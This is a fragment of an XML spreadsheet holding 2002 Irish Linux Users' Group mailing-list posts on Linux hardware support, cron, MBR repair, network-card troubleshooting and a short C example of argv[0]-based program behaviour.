&gt; directories) and the other users (including good old alfio) don't have any
&gt; problems.
&gt; 
&gt; 
&gt; Niall
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not knocking dell in general, my next machine is going to be a dell. But
buying a
random dell box is likely to result in much tearing out of hair. --B-----Original Message-----
From: Stephen_Reilly@dell.com [mailto:Stephen_Reilly@dell.com]
Sent: 02 August 2002 09:20
To: ilug@linux.ie
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there.I also found somewhere (not through personal experience though) that
2.4.19-pre10ac2 includes drivers for the chipset ?Steve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</si>
  <si>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John P. Looney wrote:
&gt; On Thu, Aug 01, 2002 at 04:03:07PM +0100, Padraig Brady mentioned:
&gt; 
&gt;&gt;Some local Irish wildlife
&gt;&gt;
&gt;&gt;http://www.iol.ie/~padraiga/pics/wild1.jpg
&gt;&gt;http://www.iol.ie/~padraiga/pics/wild2.jpg
&gt;&gt;
&gt;&gt;was I bored or what?
&gt; 
&gt;  Most likely.
&gt; 
&gt;  Hey...is that one of my nice wai-yip stuffed ones ?Ah, I new I had one extra.
Ransom is a pint.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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box.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi,I've installed Quake 3 onto my computer and it starts to run up ok but as
soon as the graphics start it bails out.  It complains that there is an
error in sis_drv.o,  the line before this says that it is starting Quake in
24 bit depth, now from http://www.winischhofer.net/linuxsis630.shtml I
understand that the sis630 won't do 24 bit depth.  So is there a way to make
Quake start up in 16 bit depth?  I've done some "google"ing but drawn a
blank.....ThanksGreg
**************************************************************************
The information contained in this e-mail is confidential,
may be privileged and is intended only for the use of the
recipient named above. If you are not the intended
recipient or a representative of the intended recipient,
you have received this e-mail in error and must not copy,
use or disclose the contents of this email to anybody
else. If you have received this e-mail in error, please
notify the sender immediately by return e-mail and
permanently delete the copy you received. This email has
been swept for computer viruses. However, you should
carry out your own virus checks.
Registered in Ireland, No. 205721. http://www.FINEOS.com
**************************************************************************
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:40:52AM +0100, Padraig Brady mentioned:
&gt; &gt; Most likely.
&gt; &gt; Hey...is that one of my nice wai-yip stuffed ones ?
&gt; Ah, I new I had one extra.
&gt; Ransom is a pint. Well, as you seem to be mating them up in Longford, keep it till it has
chicks, and send me two :)Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Saw this on the secure shell mailing list...Conor----- Forwarded message from quentyn@fotango.com -----Date: Thu, 01 Aug 2002 12:26:53 +0100
From: quentyn@fotango.com
To: "secureshell@securityfocus.com" 
Subject: OpenSSH trojan?Posts doing the rounds ( probably loads of these posts sitting awaiting
moderation)looks like there is a trojan in the latest OpenSSH
http://www.mavetju.org/weblog/weblog.php
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security----- End forwarded message ------- 
Conor Daly 
Met Eireann, Glasnevin Hill, Dublin 9, Ireland
Ph +353 1 8064276 Fax +353 1 8064247
------------------------------------
bofh.irmet.ie running RedHat Linux  9:54am  up 22:32,  9 users,  load average: 0.67, 0.36, 0.29
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.This footnote also confirms that this email message has been swept 
for the presence of computer viruses.
**********************************************************************
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; bad thing. Just a bad thing for those that hope a distro will 
&gt; work out of
&gt; the box.	It's still quite easy to find out, pre-purchase, what components if
any are going to give you problems with a specific distribution/version.
With Dell just check the support.dell.com site, match the system, look for
downloadable drivers. From these if there aren't any linux drivers you can
usually find out the chipset of each device. Plug them into google with
"linux" and see what people have to say about them. Generally speaking when
you buy the system you'll be told the make/model of each device rather than
the chipset, so further investigation is necessary.	The cavaet, of course, is always to know exactly what you're buying.
In most people's cases unfortunately it's not the person who bought the
systems that will be configuring them.steve
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:55:02AM +0000, Conor Daly wrote:
&gt; looks like there is a trojan in the latest OpenSSHand the amazing bit is that it was caught in 6 hours thanks to the
freebsd ports system (it automatically checks md5sums).kevin--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</si>
  <si>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
When I get a box I don't want any of that integrated chipset crap 
whether its for winblows or linux. Its just like IBM (mwave dsp chip ?)
(shared video/main memory ?)in the old days. I know you can flip a 
mboard jumper switch to turn crap off and install your own cards 
but why bother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machines.And this isn't taking a swing at you John but ...&gt;&gt;Just a bad thing for those that hope a distro will work out of
&gt;&gt;the box.A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anyhow"When Dell were squabbling with Windows and it looked as though there might
be 
a Dell/Redhat alliance my Inspiron 4000 was produced ... it worked a treat,
now that dell doesn't give a shit about linux all their new cheap boxes are
linux 
incompatable in small ways.--B-----Original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box.Kate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</si>
  <si>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&gt; When I get a box I don't want any of that integrated chipset crap 
&gt; whether its for winblows or linux. Its just like IBM (mwave 
Then buy a Dimension. The alternative is there.
&gt; However if you want that box for linux and you have a life 
&gt; and you dont
&gt; want to spend a week of it fucking arround and googling to 
&gt; get that box
&gt; working properly be damned sure you do your research before 
&gt; you buy it.
Absolutely, to buy a machine and hope later that linux will take to it is
beyond naive. There is a lot of support, mailing lists, web sites, etc that
will help people decide if Linux is going to like a box or not, use them.&gt; (without a net connection/56k modem). And the machine has got 
&gt; this crap
&gt; windoze
&gt; only hardware and eventually you shrug in frustration and they say 
Or its a television set with one of those wireless keyboards :)&gt; When Dell were squabbling with Windows and it looked as 
I must have misssed that bit ? I don't recall any "squabble" with Microsoft
when Dell decided to expand their product range to include RH.&gt; a Dell/Redhat alliance my Inspiron 4000 was produced ... it 
There *IS* a Dell/Redhat alliance. It lead to a shocking amount of Dell
systems being easily configurable with RHL.&gt; now that dell doesn't give a shit about linux all their new 
&gt; cheap boxes are
&gt; linux 
&gt; incompatable in small ways.
You make it sound that incompatibility has been deliberately built into the
new systems. The products that any company sell with linux installed will be
easily reinstalled with linux. The products sold with Windows only may not
be. Having said that I've never found a Dell system it was impossible to put
RH on. I have had one or two headaches in the past doing it, though.steve
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:41:52AM +0100, Gregory McRandal (ext 722) wrote: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make
&gt; Quake start up in 16 bit depth?  I've done some "google"ing but drawn a
&gt; blank.....Hmm. Check to see what colour-depth your X session is running in. Try
changing DefaultDepth to 16 (in /etc/X11/XF86Cnfig-4), and restarting X.
Letting us know what distro you're using would help too.Steve
-- 
"Oh look, it's the Pigeon of Love."-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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errors).Typically if there's any output from the commands you've run,
they're mailed to you.-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ladies,I setup a cron job to do a full backup to tape drive there last night, but
I'm just wondering how I can verify that it actually ran? 
I suppose that a mail will be sent to root as I ran crontab -e as root. Is
that correct or should I be looking elsewhere?Thanks to everyone who replies in advance. Best Regards
CW-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Wynne, Conor wrote:
&gt; Hi ladies,
&gt; 
&gt; I setup a cron job to do a full backup to tape drive there last night, but
&gt; I'm just wondering how I can verify that it actually ran? 
&gt; I suppose that a mail will be sent to root as I ran crontab -e as root. Is
&gt; that correct or should I be looking elsewhere?/var/log/cronLogs user, name of job run, and pid it ran as.Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Ciaran Mac Lochlainn stated the following:
&gt; 
&gt; SoloCDM wrote:
&gt; 
&gt; &gt; Liam Bedford stated the following:
&gt; 
&gt; 
&gt; 
&gt; &gt;&gt; fdisk /mbr will restore a dos MBR.. it'll leave the partitions
&gt; &gt;&gt; alone.
&gt; 
&gt; &gt;&gt; linux fdisk and deleting all partitions will actually leave LILO in
&gt; &gt;&gt; the MBR though.
&gt; 
&gt; &gt; While I am in Linux, the following message is the output when I
&gt; &gt; execute fdisk /mbr, even though the drive is in read and write mode:
&gt; 
&gt; &gt; Unable to open /mbr
&gt; 
&gt; &gt; The mbr is on a separate drive -- not related to the Linux drive.
&gt; 
&gt; fdisk /mbr is a DOS command - if you are in Linux you will be running
&gt; Linux fdisk, which doesn't have the /mbr option.  The Linux equivalent
&gt; of "fdisk /mbr" is "lilo -u /dev/hda" (unless John Reilly was making
&gt; that up yesterday - I haven't tried it!)Thanks!In the past I tried "lilo -u /dev/hda" and it wouldn't work -- an
original copy of the MBR must be in /boot directory for it to work. 
Which is exactly what I didn't have.  The installation of Linux
Mandrake didn't afford me that luxury.Also, I'm glad you cleared up the fdisk issue.  I know better now --
previously I was under the impression that fdisk had a hidden switch. 
This is obviously not the case.--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</si>
  <si>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"Hunt, Bryan" stated the following:
&gt; 
&gt; choose the repair option when installing windows nt/2000/whateverWhat is the "repair option"?&gt;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</si>
  <si>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&gt; == SoloCDM
&gt;&gt; == Bryan Hunt&gt;&gt; choose the repair option when installing windows nt/2000/whatever&gt; What is the "repair option"?When you boot from the WNT/W2k/whatever install CD, it offers you the
choice of installing a new system, or repairing an existing
installation.           Colm-- 
Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
Why be difficult when, with a bit of effort, you could be impossible?
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
on NT 4 you should get it at the point where you choose 
which partition to format/install onto .... It's been a 
while though so I might be wrong. Ted says I might have 
dreamed it just like that spider baby/Linux thing :-)--Dougal-----Original Message-----
From: SoloCDM [mailto:deedsmis@aculink.net]
Sent: 02 August 2002 10:33
To: Hunt, Bryan
Cc: ILUG (Request)
Subject: Re: removing lilo
"Hunt, Bryan" stated the following:
&gt; 
&gt; choose the repair option when installing windows nt/2000/whateverWhat is the "repair option"?&gt;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</si>
  <si>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Hi, folks -Wearing my other hat today - we're looking for a competent and
experienced system administrator here, and I'd like anyone who's
interested to contact me.The job is for a Windows (NT and 2000) and Linux (Debinan) system and
network administrator, with a good, deep knowledge of both
environments.  The successful candidate will have a broad range of
responsibilities in maintaining and developing our IT and production
infrastructure, including WAN/secure networking to remote offices,
email systems management, backups, etc., so experience in managing
larger networks is required.Some development and implementation research experience would also be
highly desireable.In addition, the position will involve internal IT support for a
primarily Windows network with approximately fifty users in several
locations.The precise remuneration package will depend on the skillset of the
successful applicant, but will include as standard a performance-based
bonus scheme, health insurance, stock options and participation in a
company-backed pension plan.Please contact me directly if you wish to apply.We now return you to your regularly-scheduled hrishy.           Colm-- 
Colm Buckley - Systems Architect at NewWorldIQ
w : http://www.newworldiq.com/    e : colm@newworldiq.com
t : +353 1 4334334    f : +353 1 4334301    m : +353 87 2469146
Quantum mechanics: the dreams stuff is made of.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;===== Original Message From deedsmis@aculink.net, ilug@linux.ie =====
&gt;"Hunt, Bryan" stated the following:
&gt;&gt;
&gt;&gt; choose the repair option when installing windows nt/2000/whatever
&gt;
&gt;What is the "repair option"?
&gt;
If u choose Setup NT from the installation CD it will reboot your system
and give the option of repairing an existing installation when it reboots.
I did this the other night, with the check MBR option, but it didn't 
overwrite the MBR like it should (apparently). Either my disk is completely
shagged or i'm missing something.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri 02 Aug 2002 13:41, Colm Buckley wrote:&gt; The job is for a Windows (NT and 2000) and Linux (Debinan) [...]Pah."Debian".         Colm-- 
Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
You're slower than a herd of turtles stampeding through peanut butter.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,fergal@esatclear.ie said:
&gt; 7.3 seems to support Chinese input out of the box, it's got
&gt; miniChinput and  some other stuff no documentation. I cannot get much
&gt; sense from the  Chinese-HOWTO (it seems the HOWTOs no longer come with
&gt; Redhat which sucks  somewhat, are they hidden on 1 of the disks or
&gt; something?) and google is a  bit of a dead end too.&gt; Can anyone tell me what I should do? Thanks,How about xcin?
http://xcin.linux.org.tw/This is an example of an XIM approach that Brian mentioned. hint shift-space 
get you back to typing in english.The speed you can type at will be very dependent on how well you know the 
input method and in some cases how well you know how to construct chinese 
characters.I have seen people using electronic pen and tablet devices to just write the 
characters in, though that was windows.~Al
--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</si>
  <si>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 xml:space="preserve">On Fri, Aug 02, 2002 at 05:21:22PM +0100, Conor Daly wrote:&gt; My 17" CRT monitor having drowned in a flood (10cm squared of burned 
&gt; circuit board URGH!) , I'm thinking of a 15" LCD as a replacement.  
&gt; What with me going to the continent and all next week, I might wait and 
&gt; buy one there (for a reasonable price (Dave Neary!  Any good sources?)).Conor - it's a rather large continent - people might need to know where you
are going to suggest sources. And if you're buying abroad, make sure you get
to test it - many places won't have facilities for you to do that.&gt; Question is: CAn I just plug in _any_ lcd monitor and expect it to work?  
&gt; Are there special incantations needed for XFree86 to work.  Needless to
&gt; say, it'll be a bit difficult to bring it back to the shop once I'm home 
&gt; in Dublin and find it doesn't work!Any monitor should just work - they all have VGA connectors and any half
decent brand will be know about by XFree setup programs in modern
distributions. However, if you have the budget (insurance paying for the
dead monitor, perhaps ? - and WHERE was your monitor that it got caught in a
flood ?) getting a monitor with a DVI input is best. Of course, you'll need
a DVI out video card then, too. DVI provides a much better picture than VGA
because it removes the analog stage - basically DVI gives you a direct
connection from video ram pixels to monitor pixels - the best pictures I've
ever seen on a computer is on my notebook screen at 1400x1050 (which doesn't
use DVI, but an internal connection which has the same effect). Brand wise,
I like Iiyama a lot and I think they may have a Europe wide warranty.Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Stephen_Reilly@dell.com (Stephen_Reilly@dell.com):&gt; You make it sound that incompatibility has been deliberately built
&gt; into the new systems. The products that any company sell with linux
&gt; installed will be easily reinstalled with linux. The products sold
&gt; with Windows only may not be. Having said that I've never found a Dell
&gt; system it was impossible to put RH on. I have had one or two headaches
&gt; in the past doing it, though.I just wanted to second what Stephen says, from an independent
perspective:  The few times I've encountered an obstacle installing
current Linux distributions on Dell boxes, it's been because Dell were
an early adopter of (e.g.) a new Adaptec SCSI chipset, which hadn't 
been included in all installation kernels.  And that is the risk you
_always_ take when you blindly buy hardware systems for Linux without
verifying chipset support, first.  If anything, Dell have over the years
occasioned less such trouble than have many competitors, in this area.-- 
Cheers,   If C gives you enough rope to hang yourself, then C++ give you enough
Rick Moen    to bind and gag your neighbourhood, rig the sails on a small ship,
rick@linuxmafia.com    and still have enough to hang yourself from the yardarm.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 01:41:30PM +0100, Colm Buckley wrote:
&gt; Wearing my other hat today - we're looking for a competent and
&gt; experienced system administrator here, and I'd like anyone who's
&gt; interested to contact me.hey, so are we!&gt; The job is for a Windows (NT and 2000) and Linux (Debinan) system
[admin]but we use a real distribution (redhat), so if you were ok up to the
debian part, drop me a line.  it does involve windows, it will involve
it a lot.  the linux stuff will be minor, though as times go on that
might change.  the main part is corporate windows desktop support.please mail me if you're interested?thanks!kevin--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</si>
  <si>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Friday 02 August 2002 09:41, Gregory McRandal (ext 722) wrote:
&gt; Hi,
&gt;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&gt; make Quake start up in 16 bit depth?  I've done some "google"ing but drawn
&gt; a blank.....
&gt;
&gt; Thanks
&gt;
&gt; GregIf your card has its own MesaGL drivers it may want you to remove the one in 
the Quake directory (certainly NVidia cards do this). Have a look at the docs 
for your card's Linux drivers.
Bob-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Thu, 1 Aug 2002 17:35:51 +0100
  | From: Lars Hecking 
  | 
  | &gt; quickie for shell scripters:
  | &gt; How do I find out the time a file was created at?
  |  
  |  There is no canonical test, and the information is not necessarily
  |  available.  [ ... ]  This information is also shown by ls -lc, but
  |  parsing ls' output requires a bit of effort. I'd rather recommend
  |  [ writing ] a short C program to access the file status directly,
  |  and output the ctime directly (seconds since the epoch, i.e. perfect
  |  |  for numerical comparison). some systems have a stat(1) tool --- don't think it's GNU --
 which, when given the `-t' option, does exactly what Lars is
 suggesting:   $ stat -t /etc/motd
   /etc/motd 21 8 81a4 0 0 303 79 1 0 0 1028070983 830730492 1013296719 minor problem is the `-t' format is not actually explained in
 the man page, but its fairly easy to work out (or you can just
 look at the source).  also, since the filename is printed as
 the first "field", bizarre filenames (e.g., ones which contain
 spaces or newlines) can confuse a simple script.cheers!
	-blf-  |  (Another way is to use GNU find -printf with a custom format [ ... ]
--
 Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
 Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
 expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
  For a rÃ©sumÃ©, contact me, or see my website  http://www.blf.utvinternet.ie    Stop E$$o (ExxonMobile):  Â«Whatever you do, don't buy Esso --- they
     don't give a damn about global warming.Â»    http://www.stopesso.com
     Supported by Greenpeace, Friends of the Earth, and numerous others...-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,
	I'm looking for help on this one. I have a server with SME5.5 installed
- used to be e-smith. It's based on RH7.1, has a 3c507 NIC, and is
connected to a hub. Also connected to the hub are a laptop and
workstation, both with RH7.3 . The server supplies DHCP amongst other
things.
	The problem is interruptions in the network. If I ping the laptop from
the workstation, or the other way around, there are no problems, i.e.
shows up as 0% loss. If however I ping the server from the laptop or
workstation, it will do a few packets, anywhere from 3 to 20, and then
stop responding, it will start again after a little while.
	The server is definitely not overloaded, 128Mb, and seems to be
configured correctly. In /etc/modules.conf,;options 3c507 irq=0x5 io=0x300
alias eth0 3c507there is an option in there for something called hisax, but whatever
that is, the machine doesn't have one.
	doing route shows 192.168.0.0 as going through eth0 which is correct.	Any help on this appreciated.	Eamonn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Eamonn Shinners wrote:
&gt; Hi guys,&gt; there is an option in there for something called hisax, but whatever
&gt; that is, the machine doesn't have one.Hisax is one of the ISDN modules : doesn't apply at all in this
case and won't affect your system.Can't really help with the rest, soz.Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 08:40:10PM +0100 or so it is rumoured hereabouts, 
Niall O Broin thought:
&gt; On Fri, Aug 02, 2002 at 05:21:22PM +0100, Conor Daly wrote:
&gt; 
&gt; &gt; My 17" CRT monitor having drowned in a flood (10cm squared of burned 
&gt; &gt; circuit board URGH!) , I'm thinking of a 15" LCD as a replacement.  
&gt; &gt; What with me going to the continent and all next week, I might wait and 
&gt; &gt; buy one there (for a reasonable price (Dave Neary!  Any good sources?)).
&gt; 
&gt; Conor - it's a rather large continent - people might need to know where you
&gt; are going to suggest sources. And if you're buying abroad, make sure you get
&gt; to test it - many places won't have facilities for you to do that.Um yeah, I suppose that'd be useful info...  Western France, La Rochelle
area.  Test as in test with Linux or just turn on and see that it works?&gt; &gt; Question is: CAn I just plug in _any_ lcd monitor and expect it to work?  
&gt; &gt; Are there special incantations needed for XFree86 to work.  Needless to
&gt; &gt; say, it'll be a bit difficult to bring it back to the shop once I'm home 
&gt; &gt; in Dublin and find it doesn't work!
&gt; 
&gt; Any monitor should just work - they all have VGA connectors and any half
&gt; decent brand will be know about by XFree setup programs in modern
&gt; distributions. However, if you have the budget (insurance paying for the
&gt; dead monitor, perhaps ? - and WHERE was your monitor that it got caught in aBathroom upstairs, Computer desk downstairs, got dripped into, started
clicking rapidly and smoking before it was noticed and unplugged...&gt; flood ?) getting a monitor with a DVI input is best. Of course, you'll need
&gt; a DVI out video card then, too. DVI provides a much better picture than VGAI guess that requires something more in the way of budget then...  Given
that this monitor was serving as the single monitor for 4 boxen (via a
4-way vga KVM switch), I'd be looking at investing in 4 DVI cards along
with another KVM to suit while a VGA version _should_ just plug into
place. Conor
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  5:20pm  up 72 days,  2:37,  0 users,  load average: 0.08, 0.02, 0.01
Hobbiton.cod.ie
  5:19pm  up 14 days, 23:42,  1 user,  load average: 0.01, 0.04, 0.00-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Eamonn Shinners :&gt; Hi guys,
&gt; 	I'm looking for help on this one. I have a server with SME5.5 installed
&gt; - used to be e-smith. It's based on RH7.1, has a 3c507 NIC, and is
&gt; connected to a hub. Also connected to the hub are a laptop and
&gt; workstation, both with RH7.3 . The server supplies DHCP amongst other
&gt; things.
&gt; 	The problem is interruptions in the network. If I ping the laptop from
&gt; the workstation, or the other way around, there are no problems, i.e.
&gt; shows up as 0% loss. If however I ping the server from the laptop or
&gt; workstation, it will do a few packets, anywhere from 3 to 20, and then
&gt; stop responding, it will start again after a little while.If this is new behaviour in a previously working network, what did you do to it?  Test the cables by switching which machine has which.
  Test the hub ports by switching cables around.
  Run ifconfig on the server - any errors and what kind they are.
  Test the network card... by replacing the thing!Seriously, if the server has a PCI slot free, something like a Realtek 8139
based card costs less than 20 euro.  The design is a couple of generations later
- more memory, less cruft, no *FSCKING* dos config utility, no jumpers on the
card and it's PCI.  Ronan.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I tried several ways to force the command ln to create a link with
an option attached . . . it wouldn't work.How are there four (/bin/dnsdomainname /bin/domainname
/bin/nisdomainname /bin/ypdomainname) different types of hostname
links with their own separate options?-- 
Note: When you reply to this message, please include the mailing
      list and/or newsgroup address and my email address in To:*********************************************************************
Signed,
SoloCDM-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
&gt; How are there four (/bin/dnsdomainname /bin/domainname
&gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname
&gt; links with their own separate options?The program has different behaviour depending on the value of
argv[0], probably...here's a simple example...#include 
#include 
#include long int add(long int a, long int b)
{
  return a+b;
}long int subtract(long int a, long int b)
{
  return a-b;
}int main(int argc, char **argv)
{
  long int a, b; /* Operands */
  long int (*operation)(long int a, long int b);
  char *progname, *marker;  if(argc != 3)
  {
    fprintf(stderr, "Usage: %s [int1] [int2]\n", argv[0]);
    exit(1);
  }  progname = strrchr(argv[0], '/');
  if(progname == NULL)
    progname = argv[0];
  else
    progname ++; /* Skip past the '/' */
  if(strcmp(progname, "add") == 0)
  {
    operation = add;
  }
  else if (strcmp(progname, subtract) == 0)
  {
    operation = subtract;
  }
  else
  {
    fprintf(stderr, "Program called with invalid "
            "name %s. Quitting.\n", argv[0]);
    exit(1);
  }  a = strtol(argv[1], &amp;marker, 0); /* Use base 16 for args
                                    * starting 0x, and base 8 for 
                                    * args starting 0 */
  if(*marker != '\0')
  {
    fprintf(stderr, "Invalid character %c in argument %s.\n",
            *marker, argv[1]);
    exit(1);
  }  b = strtol(argv[2], &amp;marker, 0); /* Use base 16 for args
                                    * starting 0x, and base 8 for 
                                    * args starting 0 */
  if(*marker != '\0')
  {
    fprintf(stderr, "Invalid character %c in argument %s.\n",
            *marker, argv[2]);
    exit(1);
  }
  printf("%ld %c %ld = %ld\n", 
          a, 
          (operation == add)?'+':'-', 
          b, 
          operation(a, b));
  return 0;
}Say that's in operation.c, compile it using gcc -ansi -pedantic -Wall -W -O2 -o add operation.c
and then 
ln add subtract
and run both, with appropriate arguments.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Aug 04, 2002 at 04:36:11AM -0600, SoloCDM wrote:
&gt; I tried several ways to force the command ln to create a link with
&gt; an option attached . . . it wouldn't work.
&gt; 
&gt; How are there four (/bin/dnsdomainname /bin/domainname
&gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname
&gt; links with their own separate options?
&gt; 
There's a switch statement in the program on argv[0].It's not including any options in the link.L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.However I have encountered one problem, my network card now dosent work, well kind of dosent work...Instead of one eth0 on IRQ 10 I now get:
Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.
Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.
Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.htmlThis results in the interface(s) coming up but while packets can go out they can not come in.I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?Cheers,
~Al-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.Bod&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1On Sun, 4 Aug 2002, Albert White stated:&gt; Hi folks,
&gt; 
&gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21
&gt; to the latest from kernel.org which is 2.4.19.
&gt; 
&gt; However I have encountered one problem, my network card now dosent
&gt; work, well kind of dosent work...
&gt; 
&gt; Instead of one eth0 on IRQ 10 I now get:
&gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port,
